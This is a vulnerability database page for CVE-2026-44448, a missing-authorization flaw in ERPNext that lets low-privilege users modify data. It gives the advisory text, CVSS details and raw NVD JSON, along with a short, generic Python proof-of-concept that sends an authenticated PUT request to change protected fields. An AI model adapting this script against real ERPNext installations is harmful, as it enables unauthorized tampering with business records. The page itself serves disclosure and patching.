Security Vulnerability Report
中文
CVE-2026-44448 CVSS 5.9 MEDIUM

CVE-2026-44448

Published: 2026-05-13 22:16:46
Last Modified: 2026-05-14 16:29:06
Source: [email protected]

Description

ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.102.0 and 16.11.0, certain endpoints failed to enforce proper authorization checks, allowing users to modify data beyond their permitted role. This vulnerability is fixed in 15.102.0 and 16.11.0.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

ERPNext < 15.102.0
ERPNext < 16.11.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target ERPNext instance URL TARGET_URL = "http://erpnext-target.com" API_ENDPOINT = f"{TARGET_URL}/api/resource/SomeSensitiveData/doc_id_to_modify" # Low-privilege user credentials (Valid session required) API_KEY = "low_priv_api_key" API_SECRET = "low_priv_api_secret" # Headers with authentication headers = { "Authorization": f"token {API_KEY}:{API_SECRET}", "Content-Type": "application/json" } # Payload attempting to modify data beyond user's role payload = { "critical_field": "unauthorized_value", "status": "Approved" } try: # Sending PUT request to exploit the authorization bypass response = requests.put(API_ENDPOINT, json=payload, headers=headers) if response.status_code == 200: print("[+] Exploit successful! Data modified.") print(f"[+] Response: {response.text}") else: print(f"[-] Exploit failed or patched. Status code: {response.status_code}") print(f"[-] Response: {response.text}") except Exception as e: print(f"[!] Error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44448", "sourceIdentifier": "[email protected]", "published": "2026-05-13T22:16:45.913", "lastModified": "2026-05-14T16:29:06.413", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "ERPNext is a free and open source Enterprise Resource Planning tool. Prior to 15.102.0 and 16.11.0, certain endpoints failed to enforce proper authorization checks, allowing users to modify data beyond their permitted role. This vulnerability is fixed in 15.102.0 and 16.11.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/frappe/erpnext/security/advisories/GHSA-444j-g95x-5pqv", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.